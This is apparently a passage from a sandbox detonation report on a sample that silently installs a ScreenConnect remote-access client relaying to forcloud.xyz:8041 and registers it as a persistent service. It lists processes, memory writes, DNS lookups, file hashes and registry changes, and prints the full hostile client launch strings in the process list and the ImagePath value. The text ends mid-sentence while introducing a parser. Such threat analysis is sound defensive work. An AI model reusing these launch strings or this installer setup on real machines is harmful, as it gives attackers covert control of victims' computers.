Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2944 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe C:\Windows\SysWOW64\msiexec.exe
PID 2944 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe C:\Windows\SysWOW64\msiexec.exe
PID 2944 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe C:\Windows\SysWOW64\msiexec.exe
PID 4920 wrote to memory of 528 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4920 wrote to memory of 528 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4920 wrote to memory of 528 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 528 wrote to memory of 1740 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\rundll32.exe
PID 528 wrote to memory of 1740 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\rundll32.exe
PID 528 wrote to memory of 1740 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\rundll32.exe
PID 4920 wrote to memory of 3504 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 4920 wrote to memory of 3504 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 4920 wrote to memory of 2864 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4920 wrote to memory of 2864 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4920 wrote to memory of 2864 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4920 wrote to memory of 2260 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4920 wrote to memory of 2260 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4920 wrote to memory of 2260 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4636 wrote to memory of 608 N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
PID 4636 wrote to memory of 608 N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

Uses Volume Shadow Copy service COM API

ransomware

In this detonation the VSS activity is the Windows Installer creating a system restore point before the install (vssvc.exe and srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2 in the process list below); the process list shows no vssadmin or wmic shadow-copy deletion, so the ransomware tag is a generic heuristic here rather than evidence of encryption behaviour.

Processes

C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe

"C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 3B3FA75DA6090FA1D6B10FDD8DC4666D C

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240633250 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding C50216D1B5C8D9063CE30DF11C96E2E2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding E8B38A38F3824AA6F607D57AD88FD9CE E Global\MSI0000

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe

"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=forcloud.xyz&p=8041&s=92e7fd01-fc29-45eb-8a0d-d62071f48800&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=JacekK&c=PL&c=&c=&c=&c=&c=&c=&c="

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "14beaf0b-de62-47f8-a1ec-9c03318254ed" "User"

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 100.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 forcloud.xyz udp
US 8.8.8.8:53 forcloud.xyz udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 forcloud.xyz udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 forcloud.xyz udp
US 8.8.8.8:53 forcloud.xyz udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 forcloud.xyz udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 forcloud.xyz udp

Files

memory/2944-0-0x0000000074F0E000-0x0000000074F0F000-memory.dmp

memory/2944-1-0x00000000031C0000-0x00000000031C8000-memory.dmp

memory/2944-2-0x0000000005AC0000-0x0000000005DB4000-memory.dmp

memory/2944-3-0x00000000056F0000-0x000000000577C000-memory.dmp

memory/2944-4-0x0000000074F00000-0x00000000756B0000-memory.dmp

memory/2944-5-0x0000000005790000-0x00000000057B2000-memory.dmp

memory/2944-6-0x00000000057C0000-0x000000000596A000-memory.dmp

memory/2944-7-0x0000000006370000-0x0000000006914000-memory.dmp

memory/2944-8-0x0000000074F00000-0x00000000756B0000-memory.dmp

memory/2944-9-0x0000000074F00000-0x00000000756B0000-memory.dmp

memory/2944-14-0x0000000074F00000-0x00000000756B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi

MD5 6ebb0b130daf468e91c095bf931388cb
SHA1 c503cd29966246a33d6b8196c4788e4d83dffa09
SHA256 824fd5fc45bc205cc73a9545c396bfaebaa5460d93eeac2aff049bc11c2036f0
SHA512 e8d2153f8709f22f28fdb8b6867c2f3c7f6abc4180a44cd35eeb277ef09f181ab0a08c53de309aa641498d6208a20bd0d842c0bedead22d4df9ae4f95ff6bdc0

memory/2944-12-0x0000000074F00000-0x00000000756B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp

MD5 845b0569d54305e62c6e8ffe198d217c
SHA1 cd06c3d1554fe08099ada4f4448a23a6422e6234
SHA256 4da6c507c746cd07ca4546e723d0d145bbf4d26ff8de13f1a0750ef323a89a2e
SHA512 af45bb8199f2af323b9954da0d11eed51459708608d356bc40bd9d9189c02c2c902f533077724dd7c6a7068e564b5c8f621ef1032098cef26ed26d5bf26e23fe

C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp-\Microsoft.Deployment.WindowsInstaller.dll

MD5 5ef88919012e4a3d8a1e2955dc8c8d81
SHA1 c0cfb830b8f1d990e3836e0bcc786e7972c9ed62
SHA256 3e54286e348ebd3d70eaed8174cca500455c3e098cdd1fccb167bc43d93db29d
SHA512 4544565b7d69761f9b4532cc85e7c654e591b2264eb8da28e60a058151030b53a99d1b2833f11bfc8acc837eecc44a7d0dbd8bc7af97fc0e0f4938c43f9c2684

memory/1740-42-0x0000000004E80000-0x0000000004EAE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp-\ScreenConnect.InstallerActions.dll

MD5 9260afe4bbde2549fc0b92f657c2e50a
SHA1 5580778a62b06d7b56d3f788727514551de31647
SHA256 588d3a5e1b91d3756f74ea61c9c1b5f7871af924fab469cebb579f8aeb2fc135
SHA512 afce644ee04813e1e323b719e8ad3cfefe6e20ad0aa821f1325b8e0ae0144a7cff4e0f1f4b6f45df33f060392f94bcfd88d62b2218fd0bc573d65a20d80e968b

C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp-\ScreenConnect.Core.dll

MD5 3b1ba4bebefdc8a95b0f2f0b4e50c527
SHA1 15551d2e8bfb829f3a96d161b43de820c0d417ce
SHA256 a843b3a4549c43ef5bd8470cacf5d2f0f3b3c8110441fcc10079facc7db3de29
SHA512 f41595586cd5330537f5f02b392310b028e36f618e2583d125430ecd103ebbf6d2cf6befcfb1b32279eeb9fd7ef018f49131e3906fb61bc324da85d93a9a18c7

memory/1740-50-0x0000000004F60000-0x0000000004FEC000-memory.dmp

memory/1740-46-0x0000000004EC0000-0x0000000004ECC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp-\ScreenConnect.Windows.dll

MD5 d196174cf03f86c8776e717f07d5d19f
SHA1 bbd2c6a59229b3e4ec7c5742248f3f55a61dd216
SHA256 a1edd67a131505cc84d76601474c53874a56b5437b835838e4a866e20f6cd264
SHA512 cf4d159bcb42a1a7ea03f8877736cace109ae79998906b9178c74f7a9b63030cddc2bc94ef6c5f718e99c2d0039cf3589f8c4f2bf5b67db94b3b96d2c988b45b

memory/1740-54-0x00000000051A0000-0x000000000534A000-memory.dmp

C:\Windows\Installer\MSIFD1E.tmp

MD5 ba84dd4e0c1408828ccc1de09f585eda
SHA1 e8e10065d479f8f591b9885ea8487bc673301298
SHA256 3cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852
SHA512 7a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290

\??\Volume{f0eec59f-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{291c9575-6640-4619-ba6c-8ec19e9d8a84}_OnDiskSnapshotProp

MD5 6c3b76d02689c675d382e84056fa8e44
SHA1 13e56afc104e3b727cc8a8783aa1937898807480
SHA256 069a40b27b68d6a6458742f1faa61688bf464126ebfd28d95a9c263723d3b9d4
SHA512 68428e9ce1e52449fa3fe50f6a3baf02dedb94f9c20d51091cd5b50252ea425508a187e66043134c6c114b4c5e23edd4ee2c614d2595609beab40651949b22c7

\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

MD5 b887328d115c752911f6e990fba7b6f5
SHA1 8e1e3444a3f30085409d261732d11407bfa93bb3
SHA256 93ea2a8758fcff1dab55ed1b96dbf82764e40e8e2b2d67788c640a227ae1fe94
SHA512 f7a86a21d3f86bdb638d92652af24f30a9d36d8d4c34e0df096e4ac4cdf8b63aa40cec714ee4bbed9f4e0fee405da8ae43d2f52db4bb4c3e06c9a53fca6ad06d

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe

MD5 826314610d9e854477b08666330940b5
SHA1 65b601d60042cf6f263cd38ac2f63cd06a9de159
SHA256 e54963cb63c9e471e2d3d59e55e4c7aeedccafdd616b99c4b3af230608e4bcc9
SHA512 5c01d6de25d60eb6b1eb72b7fa6401b71153c2a740c41aeeb2bd302cc4e80f5c1a388b647ee16da196705ac8edbc60abda49b9a531517bb85959cc018fb5d1fb

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll

MD5 3ff07c657068430ef677181d1f67066d
SHA1 37f7e9d2ccb65b4ea2733393015635ea1b43393e
SHA256 d17cf13612039f6a4ca17b56c32399ccbe279a499c8d2f8e910b1fd6f4fff2b1
SHA512 5552208b5649ceac2b32510ea12d409a85643d27e6a9c335e049195a507ae9211aee77574376fde059747998b60ae041e191635a67c3461585aba7f9b877b095

memory/4636-120-0x00000000017E0000-0x00000000017F8000-memory.dmp

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\app.config

MD5 095c85acc658f0733bc6941163ec234c
SHA1 298c53608e02cac620702cb6abe75c70560c03b1
SHA256 8e3dc9d06b282a536e1af7806d7f434d5738d4932dae557ccd762bfeed0bfc11
SHA512 fe3fbe2bcd2baabcf192663dd7603cce1db1025a9d40ad98598d5441d892efc0c94aa41fe61256762538e0ed3bcc3e7958cdbf87c2d577ee3bdd561597635d03

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\system.config

MD5 f7f74a2053a7c858ed989f07f81b9720
SHA1 dc585c95c643e7a6b3cbb63a080e660ffebbc7b9
SHA256 fe4d54400c7fae8710be0b9040d18e78bdde3a53953629275ce40ebdcd05d7b2
SHA512 fefcef4f03b7c52346bc789f95968f26adb889a6a891eb6d782afe9c38d2571d8c703d0ad4382304a208cb44132fcfc4cdec4b5259cae6d0ba560b0ac4480043

memory/4636-131-0x0000000003FA0000-0x0000000003FF0000-memory.dmp

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll

MD5 f311a8217807f6c85817058522e234a2
SHA1 ceb586b3cf7b0ee86ea8242d9b3d8641c9444cd1
SHA256 032450cd037d9e0eec49e0b4ff44073d539775633fb4af6fd76d4cb19116aac9
SHA512 5ef1f6b595af9cc7f788680ac3f3e9b8b12baafe734a8e2f675baa57f5ef2c69806492911bda54f11c5a4b8cf3cced82cfc6e0ecf214e45083e9f9aa6a83d039

memory/4636-135-0x0000000003FF0000-0x0000000004026000-memory.dmp

memory/4636-136-0x00000000042B0000-0x0000000004342000-memory.dmp

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll

MD5 5adcb5ae1a1690be69fd22bdf3c2db60
SHA1 09a802b06a4387b0f13bf2cda84f53ca5bdc3785
SHA256 a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5
SHA512 812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73

memory/4636-138-0x0000000004210000-0x0000000004251000-memory.dmp

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll

MD5 be74ab7a848a2450a06de33d3026f59e
SHA1 21568dcb44df019f9faf049d6676a829323c601e
SHA256 7a80e8f654b9ddb15dda59ac404d83dbaf4f6eafafa7ecbefc55506279de553d
SHA512 2643d649a642220ceee121038fe24ea0b86305ed8232a7e5440dffc78270e2bda578a619a76c5bb5a5a6fe3d9093e29817c5df6c5dd7a8fbc2832f87aa21f0cc

memory/4636-140-0x0000000004490000-0x0000000004562000-memory.dmp

C:\Config.Msi\e57fbb6.rbs

MD5 6d4e03c4e249f0a09b6aa7f4141a7ae5
SHA1 7690405857a223e93b04ade1772ef67b98ae2023
SHA256 ebb09f4dd5bd12386d89c3953cb1b2523e27a3a90ff893d983b3fd3dd24dfa9e
SHA512 258879157eb40695006f5192074db8843b6eddf767f0da07a1ebc1388d0d48084ed7b200968b4c2467d09939a7b7831f19c2cda722cf1ffcee733cc05c4c96a3

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.en-US.resources

MD5 511202ed0ba32d7f09eab394c917d067
SHA1 dbd611720fd1730198f72dec09e8e23e6d6488f8
SHA256 f8398a235b29af6569f2b116e0299b95512d042f5a4cd38c98c79729a5fbdb9d
SHA512 f04b08938f3ebf8cfa1a1157a94da3ae4699494bdce566619afa5b13a8f6ebe556d522c064e5ea02e343b59a489343f77e3ea2bb2ea390aae35a626f41cadc77

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.resources

MD5 5cd580b22da0c33ec6730b10a6c74932
SHA1 0b6bded7936178d80841b289769c6ff0c8eead2d
SHA256 de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c
SHA512 c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

MD5 ab5fa8d90645878d587f386d0e276c02
SHA1 a602a20735a1104851f293965f1fe4ab678bf627
SHA256 316bbf433f1f803d113adf060c528ccc636656cee26b90f5fea011c1c73c7d16
SHA512 a181e23c8fa01bc1d9f0f9f95a5ca6112e2b61f34f4c1da696d3ccabbbd942bcc81a3f4a60921328a6020d28aed8711c22be33761cb685921d50fea8b1d7b986

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe.config

MD5 728175e20ffbceb46760bb5e1112f38b
SHA1 2421add1f3c9c5ed9c80b339881d08ab10b340e3
SHA256 87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077
SHA512 fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

memory/608-161-0x0000000000440000-0x00000000004D6000-memory.dmp

memory/608-162-0x0000000002580000-0x00000000025B6000-memory.dmp

memory/608-164-0x000000001B5D0000-0x000000001B77A000-memory.dmp

memory/608-163-0x000000001B390000-0x000000001B41C000-memory.dmp

memory/608-165-0x000000001C830000-0x000000001C9B6000-memory.dmp

memory/608-167-0x00000000025E0000-0x00000000025F8000-memory.dmp

memory/608-166-0x0000000002540000-0x0000000002558000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 17:06

Reported

2024-11-13 17:09

Platform

win7-20241010-en

Max time kernel

140s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe"

Signatures

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (20ae101cef0f1acf)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=forcloud.xyz&p=8041&s=eef8a2dd-7cdd-4d96-ac88-046f110ebda2&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAypwQqMSE80C7%2b83r5rB%2b5gAAAAACAAAAAAAQZgAAAAEAACAAAABz4llyKSKGXC4YC%2fhQUax1llOlyRp%2blcVdz46qHXpeLwAAAAAOgAAAAAIAACAAAADNXL9uItJ%2bMAk6l%2fxXe%2bbp8Dr94qV2kbvt3ErotkWmpaAEAABinbUxWPE81CWNx51hgVbSFx%2bNrzPyEJmsZrZF%2ftli5MW6BU%2frvmpwxl2uM%2bMgDHk4R%2fJHPjbi9mUig%2f4kuZkPMKFGJ9eUhzIk7MX5jipaJQ05HvQoVTtZy09%2bpdaKFmSsaC6lwqu1kottT5spMqUmannrWG%2ff8qpTwakvtmn3Aobppjyfk%2ba5Vk69WYb3727Tov%2fd0AqAl9E5%2bsYUW%2f74lNMtl8Am9G%2famNccxEGDGBo%2b8Vfu1G8YowJUYTypMxSV%2bEYAq%2b147T%2bMvyn6b106LSTLHBw7T%2bH7KQPwm35iiDN80HJWgJ8nxqoLSyJ2Tt34btAkUncyO27uHIEcB4r%2bejxY924y7VGSxavYq0F8XQjaX7hnigWYHLgKsR714w6Wy%2b0uoeKjAIGMA0Y28RN4Sdyr9v%2fklSOat9v3lV8gmcuLaEvbEj68cTEBd2gbcZlNjlBJP6xdXzDuLcwcdTTBfMOoniDaqEnYv0fefGtNtpWDIhHzqA0efBH9tVtrb3Q1lykXhj0aezk4rMRxdrOuiK6kFKOzpE4HHb3p7bpUWIcX2SpRfLzS1vWIQDZ0Pr2QVeZqEcuwBULecurFDnoyJIJBAwJ3YFJKuy45lKQ4t3GiW9gQ%2bz2FV5LJpPKo5u%2fgOatFzL8XEa2dlhjNctVMTnVZst%2bo%2fS3bldTtXW1JflxRUcktD1UBESTNnYzy19gf4vDBsQU730UPrMtPmz5MgOs6H%2b4AHoMhciX7V2FqBv5IAS7P0rOYbywh4j9KGRPKOHDpPmSF%2fnrBiDHIcZ6VMONcTbjCUvfsM1t7jUgpzSyqrDJR%2b%2bXNueg2Z2z%2frRtlehaM3VKEVWF9%2bxtkiCjR4SpYucyj8tT%2bV5S0%2bpxjMYBgtRa191RcjfydxZjR9ei6z2Rdx3qOoJnJFNVw8HKPneCYY1yX7IPu1orSR%2fSJg1VB3nsiLonSSTyKBbCFniY%2f2h%2brZTFVGn7TSLWhRJ4ncHvhdZB%2bZy8SkB29MpoduZ9B4El1%2fR5CPBQ5wIvbEcHhFeDRbvYwes1YjsPuxq8s5clcoK%2bG9ExleDI6gBc%2fAMj2orTyuIgaH8KTxi19x8DuhGpVf0BCFQPnsSGMhxsRIKjI835wR4AEY8i9vFX8MPeTuvUbPJQnnOJLXgA12bErawhrXUoZEUNqxMb4XZcy3lnVV5hzgoxouPD4BqOM%2bAB7avFqDx3bX82aHFeGFshhi9W5d1Qc9%2bADDK3VVWdMUAsuSyXeHYoUxHE2ZEyEcRvEsFd1nfNlbSCsJzPDM69L2z4siDSV2rxHGWeXSePLOOY7AekjTtYwNiy1073ySHDUX7WFnNdoW5ZYxkdPuGLhycYFVLFI8VFWUDk07Bc1eE%2bQhxy4TuN%2fbnugM6o4LIfka0VvpQJm9KnmTsVCk3FdgUrw1u%2fkkxYaj1bO6hgWpPvbHcj46vYecRZ%2f%2f7iPOVxaZrgEVBiOy3fMXP8st%2bc9ivOYICQmZ%2fQfF9e4GJJHBeWdCTLdYP%2bTS4uuxahNmuodMJuKvdw5o0m3587TBqVWyc6ANM30ztAPUY65dWo1v%2bFeWHbMcTBBxba5f2zUEUAAAAB2xS%2bAWDmhx2Ub14bMtVlP0cpw4z6xVig5oA4Brp71WnuLW%2fNaACTv0dPP5IyJF32BoNa6HhQjLWq4VH7sXzEB&t=JacekK&c=PL&c=&c=&c=&c=&c=&c=&c=\"" C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
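The launch string persisted in the ImagePath above (and passed on the ScreenConnect.ClientService.exe command line in behavioral2) is where the actionable indicators live: the relay host and port, the session ID, and the server's public key. The following Python is an added example, not code from the report or from ScreenConnect. It parses the behavioral2 launch string, decodes the k= value as the CryptoAPI PUBLICKEYBLOB it is (BLOBHEADER, RSAPUBKEY, little-endian modulus), and derives a key fingerprint for pivoting. The single-letter parameters are read per the ScreenConnect client convention (h/p relay host and port, s session ID, k server public key, t session name, c custom properties). The extra v= parameter in the behavioral1 ImagePath is a DPAPI blob (its 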